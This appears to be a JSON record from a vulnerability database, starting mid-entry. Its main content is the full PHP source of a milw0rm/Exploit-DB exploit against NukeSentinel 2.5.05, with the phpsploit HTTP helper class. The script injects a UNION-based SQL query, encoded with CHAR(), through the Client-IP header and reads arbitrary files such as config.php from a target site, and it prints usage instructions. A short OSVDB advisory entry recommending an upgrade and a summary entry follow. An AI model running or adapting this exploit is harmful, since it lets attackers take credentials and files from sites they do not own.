$this->get($location);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\treturn $code;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t\r\n\t\r\n\t/**\r\n\t * This function allows you to reset some parameters:\r\n\t * \r\n\t * $this->reset(header); // headers cleaned\r\n\t * $this->reset(cookie); // cookies cleaned\r\n\t * $this->reset(); // clean all parameters\r\n\t *\r\n\t * @param string $func\r\n\t */\r\n\tpublic function reset($func='')\r\n\t{\r\n\t\tswitch($func)\r\n\t\t{\r\n\t\t\tcase \"header\":\r\n\t\t\t$this->header='';\r\n\t\t\tbreak;\r\n\t\t\t\r\n\t\t\tcase \"cookie\":\r\n\t\t\t$this->cookie='';\r\n\t\t\tbreak;\r\n\t\t\t\r\n\t\t\tdefault:\r\n\t\t $this->cookiejar='';\r\n\t\t $this->header='';\r\n\t\t $this->cookie='';\r\n\t\t $this->allowredirection=''; \r\n\t\t $this->agent='';\r\n\t\t break;\r\n\t\t}\r\n\t}\r\n}\r\n?>\r\n\r\n# milw0rm.com [2007-03-10]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3450/"}, {"lastseen": "2016-01-31T18:14:57", "bulletinFamily": "exploit", "description": "NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit. CVE-2007-1172,CVE-2007-1493. Webapps exploit for php platform", "modified": "2007-02-20T00:00:00", "published": "2007-02-20T00:00:00", "id": "EDB-ID:3338", "href": "https://www.exploit-db.com/exploits/3338/", "type": "exploitdb", "title": "NukeSentinel 2.5.05 - nukesentinel.php File Disclosure Exploit", "sourceData": "#!/usr/bin/php\n<?php\nerror_reporting(E_ALL ^ E_NOTICE);\n\n# Module's Description:\n# Advanced site security proudly produced by: NukeScripts Network, Raven PHPScripts, & NukeResources.\n# ... IS IT A JOKE ?!\n#\n# SQL Injection --> File Disclosure\n# Maybe work on other versions.\n# Interesting exploit =)\n#\nif($argc < 5) {\nprint(\"\n NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit\n------------------------------------------------------------------\nPHP conditions: none\nCMS conditions: disable_switch<=0 (module activated)\n Credits: DarkFig <gmdarkfig@gmail.com>\n URL: http://www.acid-root.new.fr/\n------------------------------------------------------------------\n Usage: $argv[0] -url <url> -file <file> [Options]\nExample: $argv[0] -url http://www.victim.com/ -file config.php\nOptions: -proxy If you wanna use a proxy <proxyhost:proxyport> \n -proxyauth Basic authentification <proxyuser:proxypwd> \n------------------------------------------------------------------\n\"); exit(1);\n}\n\n$url = getparam('url',1); # http://localhost/php-nuke-7.9/html/\n$file = getparam('file',1); # config.php, admin/.htaccess\n$proxy = getparam('proxy');\n$authp = getparam('proxyauth');\n\n$xpl = new phpsploit();\n$xpl->agent(\"Mozilla Firefox\");\nif($proxy) $xpl->proxy($proxy);\nif($authp) $xpl->proxyauth($authp);\n\n\n# +nukesentinel.php\n#\n# 52. $nsnst_const['server_ip'] = get_server_ip();\n# 53. $nsnst_const['client_ip'] = get_client_ip();\n# 54. $nsnst_const['forward_ip'] = get_x_forwarded();\n# 55. $nsnst_const['remote_addr'] = get_remote_addr();\n# 56. $nsnst_const['remote_ip'] = get_ip(); // If $nsnst_const['client_ip'] return it, elseif $nsnst_const['forward_ip'] return it ... \n#\n#\n# $xpl->addheader(\"Client-IP\",\"<something>255.255.255.255<something>\");\n# |\n# 73. if(!ereg(\"([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\", $nsnst_const['client_ip'])) {$nsnst_const['client_ip'] = \"none\"; }\n# 74. if(!ereg(\"([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\", $nsnst_const['forward_ip'])) {$nsnst_const['forward_ip'] = \"none\"; }\n# 75. if(!ereg(\"([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\", $nsnst_const['remote_ip'])) {$nsnst_const['remote_ip'] = \"none\"; }\n# 76. if(!ereg(\"([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\", $nsnst_const['remote_addr'])) {$nsnst_const['remote_addr'] = \"none\"; }\n#\n#\n# 221. // Check if ip is blocked\n# 222. $blocked_row = abget_blocked($nsnst_const['remote_ip']);\n# 223. if($blocked_row) { blocked($blocked_row);}\n#\n#\n# $xpl->addheader(\"Client-IP\",\"' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#255.255.255.255\");\n# |\n# 723. function abget_blocked($remoteip) {\n# 724. global $prefix, $db;\n# 725. $ip = explode(\".\", $remoteip);\n# 726. $testip1 = \"$ip[0].*.*.*\"; // ' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#255.*.*.*\n# 727. $testip2 = \"$ip[0].$ip[1].*.*\"; // ' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#255.255.*.*\n# 728. $testip3 = \"$ip[0].$ip[1].$ip[2].*\"; // ' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#255.255.255.*\n# 729. $testip4 = \"$ip[0].$ip[1].$ip[2].$ip[3]\"; // ' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#255.255.255.255\n# 730. $blocked_result = $db->sql_query(\"SELECT * FROM `\".$prefix.\"_nsnst_blocked_ips` WHERE `ip_addr` = '$testip1' OR `ip_addr` = '$testip2' OR `ip_addr` = '$testip3' OR `ip_addr` = '$testip4'\");\n# 731. $blocked_row = $db->sql_fetchrow($blocked_result);\n# 732. return $blocked_row;\n# 733. }\n#\n#\n# 1044. function blocked($blocked_row=\"\", $blocker_row=\"\") {\n# 1050. if(empty($blocker_row)) { $blocker_row = abget_blockerrow($blocked_row['reason']); } // $blocked_row['reason'] ... 6,7,--->8<---,9\n#\n#\n# $xpl->addheader(\"Client-IP\",\"' UNION SELECT 1,2,3,4,5,6,7,\".mysqlchar(' UNION SELECT -666,2,3,4,5,6,7,'../config.php',9,10,11 ORDER BY blocker #).\",9,10,11,12,13,14,15,16,17,18#255.255.255.255\");\n# |\n# 750. function abget_blockerrow($reason){\n# 751. global $prefix, $db;\n# 752. $blockerresult = $db->sql_query(\"SELECT * FROM `\".$prefix.\"_nsnst_blockers` WHERE `blocker`='$reason'\"); // + ' UNION SELECT -666,2,3,4,5,6,7,'../config.php',9,10,11 ORDER BY blocker #\n# 753. $blocker_row = $db->sql_fetchrow($blockerresult);\n# 754. return $blocker_row;\n# 755. }\n#\n#\n# 1044. function blocked($blocked_row=\"\", $blocker_row=\"\") {\n# 1056. $display_page = abget_template($blocker_row['template']); // $blocker_row['template'] ... 6,7,--->'../config.php'<---,9\n#\n#\n# 1004. function abget_template($template=\"\") {\n# 1013. $filename = \"abuse/\".$template; // $template = ../config.php\n# 1014. if(!file_exists($filename)) { $filename = \"abuse/abuse_default.tpl\"; }\n# 1015. $handle = @fopen($filename, \"r\");\n# 1016. $display_page = fread($handle, filesize($filename));\n# 1017. @fclose($handle);\n# 1041. return $display_page;\n# 1042. }\n#\n# Interesting isn't it ? :]\n#\n$sql = \"' UNION SELECT 1,2,3,4,5,6,7,\"\n .mysqlchar(\"' UNION SELECT -666,2,3,4,5,6,7,'../$file',9,10,11 ORDER BY blocker #\")\n .\",9,10,11,12,13,14,15,16,17,18#255.255.255.255\";\n\n$xpl->addheader(\"Client-IP\",$sql);\n$xpl->get($url.'index.php');\nprint $xpl->getcontent();\n\nfunction mysqlchar($data)\n{\n\t$char='CHAR(';\n\tfor($i=0;$i<strlen($data);$i++)\n\t{\n\t\t$char .= ord($data[$i]);\n if($i != (strlen($data)-1)) $char .= ',';\n\t}\n\treturn $char.')';\n}\n\nfunction getparam($param,$opt='')\n{\n\tglobal $argv;\n\tforeach($argv as $value => $key)\n\t{\n\t\tif($key == '-'.$param) return $argv[$value+1];\n\t}\n\tif($opt) exit(\"\\n#3 -$param parameter required\");\n\telse return;\n}\n\n/*\n * \n * Copyright (C) darkfig\n * \n * This program is free software; you can redistribute it and/or \n * modify it under the terms of the GNU General Public License \n * as published by the Free Software Foundation; either version 2 \n * of the License, or (at your option) any later version. \n * \n * This program is distributed in the hope that it will be useful, \n * but WITHOUT ANY WARRANTY; without even the implied warranty of \n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \n * GNU General Public License for more details. \n * \n * You should have received a copy of the GNU General Public License \n * along with this program; if not, write to the Free Software \n * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n * \n * TITLE: PhpSploit Class\n * REQUIREMENTS: PHP 5 (remove \"private\", \"public\" if you have PHP 4)\n * VERSION: 1.2\n * LICENSE: GNU General Public License\n * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt\n * FILENAME: phpsploitclass.php\n *\n * CONTACT: gmdarkfig@gmail.com (french / english)\n * GREETZ: Sparah, Ddx39\n *\n * DESCRIPTION:\n * The phpsploit is a class implementing a web user agent.\n * You can add cookies, headers, use a proxy server with (or without) a\n * basic authentification. It supports the GET and the POST method. It can\n * also be used like a browser with the cookiejar() function (which allow\n * a server to add several cookies for the next requests) and the\n * allowredirection() function (which allow the script to follow all\n * redirections sent by the server). It can return the content (or the\n * headers) of the request. Others useful functions can be used for debugging.\n * A manual is actually in development but to know how to use it, you can\n * read the comments.\n *\n * CHANGELOG:\n * [2007-01-24] (1.2)\n * * Bug #2 fixed: Problem concerning the getcookie() function ((|;))\n * * New: multipart/form-data enctype is now supported \n *\n * [2006-12-31] (1.1)\n * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)\n * * New: You can now call the getheader() / getcontent() function without parameters\n *\n * [2006-12-30] (1.0)\n * * First version\n * \n */\n\nclass phpsploit {\n\n\t/**\n\t * This function is called by the get()/post() functions.\n\t * You don't have to call it, this is the main function.\n\t *\n\t * @return $server_response\n\t */\n\tprivate function sock()\n\t{\n\t\tif(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport);\n\t\telse $socket = fsockopen($this->host,$this->port);\n\t\t\n\t\tif(!$socket) die(\"Error: The host doesn't exist\");\n\t\t\n\t\tif($this->method===\"get\") $this->packet = \"GET \".$this->url.\" HTTP/1.1\\r\\n\";\n\t\telseif($this->method===\"post\" or $this->method===\"formdata\") $this->packet = \"POST \".$this->url. \" HTTP/1.1\\r\\n\";\n\t\telse die(\"Error: Invalid method\");\n\t\t\n\t\tif(!empty($this->proxyuser)) $this->packet .= \"Proxy-Authorization: Basic \".base64_encode($this->proxyuser.\":\".$this->proxypass).\"\\r\\n\";\n\t\t$this->packet .= \"Host: \".$this->host.\"\\r\\n\";\n\t\t\n\t\tif(!empty($this->agent)) $this->packet .= \"User-Agent: \".$this->agent.\"\\r\\n\";\n\t\tif(!empty($this->header)) $this->packet .= $this->header.\"\\r\\n\";\n\t\tif(!empty($this->cookie)) $this->packet .= \"Cookie: \".$this->cookie.\"\\r\\n\";\n\t\t\n\t\t$this->packet .= \"Connection: Close\\r\\n\";\n\t\tif($this->method===\"post\")\n\t\t{\n\t\t\t$this->packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n\t\t\t$this->packet .= \"Content-Length: \".strlen($this->data).\"\\r\\n\\r\\n\";\n\t\t\t$this->packet .= $this->data.\"\\r\\n\";\n\t\t}\n\t\telseif($this->method===\"formdata\")\n\t\t{\n\t\t\t$this->packet .= \"Content-Type: multipart/form-data; boundary=---------------------------\".$this->boundary.\"\\r\\n\";\n\t\t\t$this->packet .= \"Content-Length: \".strlen($this->data).\"\\r\\n\\r\\n\";\n\t\t\t$this->packet .= $this->data;\n\t\t}\n\t\t$this->packet .= \"\\r\\n\";\n\t\t$this->recv = '';\n\t\t\n\t\tfputs($socket,$this->packet);\n\t\twhile(!feof($socket)) $this->recv .= fgets($socket);\n\t\tfclose($socket);\n\t\t\n\t\tif($this->cookiejar) $this->cookiejar($this->getheader($this->recv));\n\t\tif($this->allowredirection) return $this->allowredirection($this->recv);\n\t\telse return $this->recv;\n\t}\n\t\n\n\t/**\n\t * This function allows you to add several cookie in the\n\t * request. Several methods are supported:\n\t * \n\t * $this->addcookie(\"name\",\"value\");\n\t * or\n\t * $this->addcookie(\"name=newvalue\");\n\t * or\n\t * $this->addcookie(\"othername=overvalue; xx=zz; y=u\");\n\t * \n\t * @param string $cookiename\n\t * @param string $cookievalue\n\t * \n\t */\n\tpublic function addcookie($cookn,$cookv='')\n\t{\n\t\t// $this->addcookie(\"name\",\"value\"); work avec replace\n\t\tif(!empty($cookv))\n\t\t{\n\t\t\tif($cookv === \"deleted\") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete\n\t\t\tif(!empty($this->cookie))\n\t\t\t{\n\t\t\t if(preg_match(\"/$cookn=/\",$this->cookie))\n\t\t\t {\n\t\t\t \t$this->cookie = preg_replace(\"/$cookn=(\\S*);/\",\"$cookn=$cookv;\",$this->cookie);\n\t\t\t }\n\t\t\t else\n\t\t\t {\n\t\t\t \t$this->cookie .= \" \".$cookn.\"=\".$cookv.\";\"; // \" \".\n\t\t\t }\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$this->cookie = $cookn.\"=\".$cookv.\";\";\n\t\t\t}\n\t\t}\n\t\t// $this->addcookie(\"name=value; othername=othervalue\");\n\t\telse\n\t\t{\n\t \t if(!empty($this->cookie))\n\t \t {\n\t \t \t$cookn = preg_replace(\"/(.*);$/\",\"$1\",$cookn);\n\t \t \t$cookarr = explode(\";\",str_replace(\" \", \"\",$cookn));\n\t \t \tfor($i=0;$i<count($cookarr);$i++)\n\t \t \t{\n\t \t \t\tpreg_match(\"/(\\S*)=(\\S*)/\",$cookarr[$i],$matches);\n\t \t \t\t$cookn = $matches[1];\n\t \t \t\t$cookv = $matches[2];\n\t \t \t\t$this->addcookie($cookn,$cookv);\n\t \t \t}\n\t \t }\n\t\t\t else\n\t\t\t {\n\t\t\t \t$cookn = ((substr($cookn,(strlen($cookn)-1),1))===\";\") ? $cookn : $cookn.\";\";\n\t\t\t \t$this->cookie = $cookn;\t\t\t\n\t\t\t }\n\t\t}\n\t}\n\t\n\t\n\t/**\n\t * This function allows you to add several headers in the\n\t * request. Several methods are supported:\n\t *\n\t * $this->addheader(\"headername\",\"headervalue\");\n\t * or\n\t * $this->addheader(\"headername: headervalue\");\n\t *\n\t * @param string $headername\n\t * @param string $headervalue\n\t */\n\tpublic function addheader($headern,$headervalue='')\n\t{\n\t\t// $this->addheader(\"name\",\"value\");\n\t\tif(!empty($headervalue))\n\t\t{\n\t\t\tif(!empty($this->header))\n\t\t\t{\n\t\t\t\tif(preg_match(\"/$headern:/\",$this->header))\n\t\t\t\t{\n\t\t\t\t\t$this->header = preg_replace(\"/$headern: (\\S*)/\",\"$headern: $headervalue\",$this->header);\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$this->header .= \"\\r\\n\".$headern.\": \".$headervalue;\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$this->header=$headern.\": \".$headervalue;\n\t\t\t}\n\t\t}\n\t\t// $this->addheader(\"name: value\");\n\t\telse \n\t\t{\n\t\t\tif(!empty($this->header))\n\t\t\t{\n\t\t\t\t$headarr = explode(\": \",$headern);\n\t\t\t\t$headern = $headarr[0];\n\t\t\t\t$headerv = $headarr[1];\n\t\t\t\t$this->addheader($headern,$headerv);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$this->header=$headern;\n\t\t\t}\n\t\t}\n\t}\n\t\n\n\t/**\n\t * This function allows you to use an http proxy server.\n\t * Several methods are supported:\n\t * \n\t * $this->proxy(\"proxyip\",\"8118\");\n\t * or\n\t * $this->proxy(\"proxyip:8118\")\n\t *\n\t * @param string $proxyhost\n\t * @param integer $proxyport\n\t */\n\tpublic function proxy($proxy,$proxyp='')\n\t{\n\t\t// $this->proxy(\"localhost:8118\");\n\t\tif(empty($proxyp))\n\t\t{\n\t\t\tpreg_match(\"/^(\\S*):(\\d+)$/\",$proxy,$proxarr);\n\t\t\t$proxh = $proxarr[1];\n\t\t\t$proxp = $proxarr[2];\n\t\t\t$this->proxyhost=$proxh;\n\t\t\t$this->proxyport=$proxp;\n\t\t}\n\t\t// $this->proxy(\"localhost\",8118);\n\t\telse \n\t\t{\n\t\t\t$this->proxyhost=$proxy;\n\t\t\t$this->proxyport=intval($proxyp);\n\t\t}\n\t\tif($this->proxyport > 65535) die(\"Error: Invalid port number\");\n\t}\n\t\n\n\t/**\n\t * This function allows you to use an http proxy server\n\t * which requires a basic authentification. Several\n\t * methods are supported:\n\t * \n\t * $this->proxyauth(\"darkfig\",\"dapasswd\");\n\t * or\n\t * $this->proxyauth(\"darkfig:dapasswd\");\n\t *\n\t * @param string $proxyuser\n\t * @param string $proxypass\n\t */\n\tpublic function proxyauth($proxyauth,$proxypasse='')\n\t{\n\t\t// $this->proxyauth(\"darkfig:password\");\n\t\tif(empty($proxypasse))\n\t\t{\n\t\t\tpreg_match(\"/^(.*):(.*)$/\",$proxyauth,$proxautharr);\n\t\t\t$proxu = $proxautharr[1];\n\t\t\t$proxp = $proxautharr[2];\n\t\t\t$this->proxyuser=$proxu;\n\t\t\t$this->proxypass=$proxp;\n\t\t}\n\t\t// $this->proxyauth(\"darkfig\",\"password\");\n\t\telse\n\t\t{\n\t\t\t$this->proxyuser=$proxyauth;\n\t\t\t$this->proxypass=$proxypasse;\n\t\t}\n\t}\n\n\t\n\t/**\n\t * This function allows you to set the \"User-Agent\" header.\n\t * Several methods are possible to do that:\n\t * \n\t * $this->agent(\"Mozilla Firefox\");\n\t * or\n\t * $this->addheader(\"User-Agent: Mozilla Firefox\");\n\t * or\n\t * $this->addheader(\"User-Agent\",\"Mozilla Firefox\");\n\t * \n\t * @param string $useragent\n\t */\n\tpublic function agent($useragent)\n\t{\n\t\t$this->agent=$useragent;\n\t}\n\n\t\n\t/**\n\t * This function returns the header which will be\n\t * in the next request.\n\t * \n\t * $this->showheader();\n\t *\n\t * @return $header\n\t */\n\tpublic function showheader()\n\t{\n\t\treturn $this->header;\n\t}\n\n\t\n\t/**\n\t * This function returns the cookie which will be\n\t * in the next request.\n\t * \n\t * $this->showcookie();\n\t *\n\t * @return $storedcookies\n\t */\n\tpublic function showcookie()\n\t{\n\t\treturn $this->cookie;\n\t}\n\n\t\n\t/**\n\t * This function returns the last formed\n\t * http request (the http packet).\n\t * \n\t * $this->showlastrequest();\n\t * \n\t * @return $last_http_request\n\t */\n\tpublic function showlastrequest()\n\t{\n\t\treturn $this->packet;\n\t}\n\t\n\t\n\t/**\n\t * This function sends the formed http packet with the\n\t * GET method. You can precise the port of the host.\n\t * \n\t * $this->get(\"http://localhost\");\n\t * $this->get(\"http://localhost:888/xd/tst.php\");\n\t * \n\t * @param string $urlwithpath\n\t * @return $server_response\n\t */\n\tpublic function get($url)\n\t{\n\t\t$this->target($url);\n\t\t$this->method=\"get\";\n\t\treturn $this->sock();\n\t}\n\n\t\n\t/**\n\t * This function sends the formed http packet with the\n\t * POST method. You can precise the port of the host.\n\t * \n\t * $this->post(\"http://localhost/index.php\",\"admin=1&user=dark\");\n\t *\n\t * @param string $urlwithpath\n\t * @param string $postdata\n\t * @return $server_response\n\t */\t\n\tpublic function post($url,$data)\n\t{\n\t\t$this->target($url);\n\t\t$this->method=\"post\";\n\t\t$this->data=$data;\n\t\treturn $this->sock();\n\t}\n\t\n\n\t/**\n\t * This function sends the formed http packet with the\n\t * POST method using the multipart/form-data enctype. \n\t * \n\t * $array = array(\n\t * frmdt_url => \"http://localhost/upload.php\",\n\t * frmdt_boundary => \"123456\", # Optional\n\t * \"email\" => \"me@u.com\",\n\t * \"varname\" => array(\n\t * frmdt_type => \"image/gif\", # Optional\n\t * frmdt_transfert => \"binary\", # Optional\n\t * frmdt_filename => \"hello.php\",\n\t * frmdt_content => \"<?php echo ':)'; ?>\"));\n\t * $this->formdata($array);\n\t *\n\t * @param array $array\n\t * @return $server_response\n\t */\n\tpublic function formdata($array)\n\t{\n\t\t$this->target($array[frmdt_url]);\n\t\t$this->method=\"formdata\";\n\t\t$this->data='';\n\t\tif(!isset($array[frmdt_boundary])) $this->boundary=\"phpsploit\";\n\t\telse $this->boundary=$array[frmdt_boundary];\n\t\tforeach($array as $key => $value)\n\t\t{\n\t\t\tif(!preg_match(\"#^frmdt_(boundary|url)#\",$key))\n\t\t\t{\n\t\t\t\t$this->data .= \"-----------------------------\".$this->boundary.\"\\r\\n\";\n\t\t\t\t$this->data .= \"Content-Disposition: form-data; name=\\\"\".$key.\"\\\";\";\n\t\t\t\tif(!is_array($value))\n\t\t\t\t{\n\t\t\t\t\t$this->data .= \"\\r\\n\\r\\n\".$value.\"\\r\\n\";\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$this->data .= \" filename=\\\"\".$array[$key][frmdt_filename].\"\\\";\\r\\n\";\n\t\t\t\t\tif(isset($array[$key][frmdt_type])) $this->data .= \"Content-Type: \".$array[$key][frmdt_type].\"\\r\\n\";\n\t\t\t\t\tif(isset($array[$key][frmdt_transfert])) $this->data .= \"Content-Transfer-Encoding: \".$array[$key][frmdt_transfert].\"\\r\\n\";\n\t\t\t\t\t$this->data .= \"\\r\\n\".$array[$key][frmdt_content].\"\\r\\n\";\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t$this->data .= \"-----------------------------\".$this->boundary.\"--\\r\\n\";\n\t\treturn $this->sock();\n\t}\n\n\t\n\t/**\n\t * This function returns the content of the server response\n\t * without the headers.\n\t * \n\t * $this->getcontent($this->get(\"http://localhost/\"));\n\t * or\n\t * $this->getcontent();\n\t *\n\t * @param string $server_response\n\t * @return $onlythecontent\n\t */\n\tpublic function getcontent($code='')\n\t{\n\t\tif(empty($code)) $code = $this->recv;\n\t\t$content = explode(\"\\n\",$code);\n\t\t$onlycode = '';\n\t\tfor($i=1;$i<count($content);$i++)\n\t\t{\n\t\t\tif(!preg_match(\"/^(\\S*):/\",$content[$i])) $ok = 1;\n\t\t\tif($ok) $onlycode .= $content[$i].\"\\n\";\n\t\t}\n\t\treturn $onlycode;\n\t}\n\n\t\n\t/**\n\t * This function returns the headers of the server response\n\t * without the content.\n\t * \n\t * $this->getheader($this->post(\"http://localhost/x.php\",\"x=1&z=2\"));\n\t * or\n\t * $this->getheader();\n\t *\n\t * @param string $server_response\n\t * @return $onlytheheaders\n\t */\n\tpublic function getheader($code='')\n\t{\n\t\tif(empty($code)) $code = $this->recv;\n\t\t$header = explode(\"\\n\",$code);\n\t\t$onlyheader = $header[0].\"\\n\";\n\t\tfor($i=1;$i<count($header);$i++)\n\t\t{\n\t\t\tif(!preg_match(\"/^(\\S*):/\",$header[$i])) break;\n\t\t\t$onlyheader .= $header[$i].\"\\n\";\n\t\t}\n\t\treturn $onlyheader;\n\t}\n\n\t\n\t/**\n\t * This function is called by the cookiejar() function.\n\t * It adds the value of the \"Set-Cookie\" header in the \"Cookie\"\n\t * header for the next request. You don't have to call it.\n\t * \n\t * @param string $server_response\n\t */\n\tprivate function getcookie($code)\n\t{\n\t\t$carr = explode(\"\\n\",str_replace(\"\\r\\n\",\"\\n\",$code));\n\t\tfor($z=0;$z<count($carr);$z++)\n\t\t{\n\t\t\tif(preg_match(\"/set-cookie: (.*)/i\",$carr[$z],$cookarr))\n\t\t\t{\n\t\t\t\t$cookie[] = preg_replace(\"/expires=(.*)(GMT||UTC)(\\S*)$/i\",\"\",preg_replace(\"/path=(.*)/i\",\"\",$cookarr[1]));\n\t\t\t}\n\t\t}\n\n\t\tfor($i=0;$i<count($cookie);$i++)\n\t\t{\n\t\t\tpreg_match(\"/(\\S*)=(\\S*)(|;)/\",$cookie[$i],$matches);\n\t \t $cookn = $matches[1];\n\t \t $cookv = $matches[2];\n\t \t $this->addcookie($cookn,$cookv);\n\t\t}\n }\n\n\t\n\t/**\n\t * This function is called by the get()/post() functions.\n\t * You don't have to call it.\n\t *\n\t * @param string $urltarg\n\t */\n\tprivate function target($urltarg)\n\t{\n\t\tif(!preg_match(\"/^http:\\/\\/(.*)\\//\",$urltarg)) $urltarg .= \"/\";\n\t\t$this->url=$urltarg;\n\t\t\n\t\t$array = explode(\"/\",str_replace(\"http://\",\"\",preg_replace(\"/:(\\d+)/\",\"\",$urltarg)));\n\t\t$this->host=$array[0];\n\n\t\tpreg_match(\"/:(\\d+)\\//\",$urltarg,$matches);\n\t\t$this->port=empty($matches[1]) ? 80 : $matches[1];\n\t\t\n\t\t$temp = str_replace(\"http://\",\"\",preg_replace(\"/:(\\d+)/\",\"\",$urltarg));\n\t\tpreg_match(\"/\\/(.*)\\//\",$temp,$matches);\n\t\t$this->path=str_replace(\"//\",\"/\",\"/\".$matches[1].\"/\");\n\t\n\t\tif($this->port > 65535) die(\"Error: Invalid port number\");\n\t}\n\t\n\t\n\t/**\n\t * If you call this function, the script will\n\t * extract all \"Set-Cookie\" headers values\n\t * and it will automatically add them into the \"Cookie\" header\n\t * for all next requests.\n\t *\n\t * $this->cookiejar(1); // enabled\n\t * $this->cookiejar(0); // disabled\n\t * \n\t */\n\tpublic function cookiejar($code)\n\t{\n\t\tif($code===0) $this->cookiejar='';\n\t\tif($code===1) $this->cookiejar=1;\n\t\telse\n\t\t{\n\t\t\t$this->getcookie($code);\n\t\t}\n\t}\n\n\n\t/**\n\t * If you call this function, the script will\n\t * follow all redirections sent by the server.\n\t * \n\t * $this->allowredirection(1); // enabled\n\t * $this->allowredirection(0); // disabled\n\t * \n\t * @return $this->get($locationresponse)\n\t */\n\tpublic function allowredirection($code)\n\t{\n\t\tif($code===0) $this->allowredirection='';\n\t\tif($code===1) $this->allowredirection=1;\n\t\telse\n\t\t{\n\t\t\tif(preg_match(\"/(location|content-location|uri): (.*)/i\",$code,$codearr))\n\t\t\t{\n\t\t\t\t$location = str_replace(chr(13),'',$codearr[2]);\n\t\t\t\tif(!eregi(\"://\",$location))\n\t\t\t\t{\n\t\t\t\t\treturn $this->get(\"http://\".$this->host.$this->path.$location);\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\treturn $this->get($location);\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\treturn $code;\n\t\t\t}\n\t\t}\n\t}\n\t\n\t\n\t/**\n\t * This function allows you to reset some parameters:\n\t * \n\t * $this->reset(header); // headers cleaned\n\t * $this->reset(cookie); // cookies cleaned\n\t * $this->reset(); // clean all parameters\n\t *\n\t * @param string $func\n\t */\n\tpublic function reset($func='')\n\t{\n\t\tswitch($func)\n\t\t{\n\t\t\tcase \"header\":\n\t\t\t$this->header='';\n\t\t\tbreak;\n\t\t\t\n\t\t\tcase \"cookie\":\n\t\t\t$this->cookie='';\n\t\t\tbreak;\n\t\t\t\n\t\t\tdefault:\n\t\t $this->cookiejar='';\n\t\t $this->header='';\n\t\t $this->cookie='';\n\t\t $this->allowredirection=''; \n\t\t $this->agent='';\n\t\t break;\n\t\t}\n\t}\n}\n?>\n\n# milw0rm.com [2007-02-20]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3338/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Solution Description\nUpgrade to version 2.5.07 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n\nNote: This issue was thought to be fixed in 2.5.06 but due to an incomplete patch that used a permissive regular expression to validate an IP address, SQL injection could still occur.\n## References:\n[Secunia Advisory ID:24221](https://secuniaresearch.flexerasoftware.com/advisories/24221/)\nOther Advisory URL: http://milw0rm.com/exploits/3338\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0348.html\nMail List Post: http://attrition.org/pipermail/vim/2007-March/001429.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0102.html\nKeyword: aka the \"File Disclosure Exploit.\" \n[CVE-2007-1493](https://vulners.com/cve/CVE-2007-1493)\n[CVE-2007-1172](https://vulners.com/cve/CVE-2007-1172)\n", "modified": "2007-02-20T08:48:53", "published": "2007-02-20T08:48:53", "href": "https://vulners.com/osvdb/OSVDB:33765", "id": "OSVDB:33765", "title": "NukeSentinel nukesentinel.php Client-IP HTTP Header SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-03-11T00:00:00", "published": "2007-03-11T00:00:00", "id": "SECURITYVULNS:VULN:7386", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7386", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
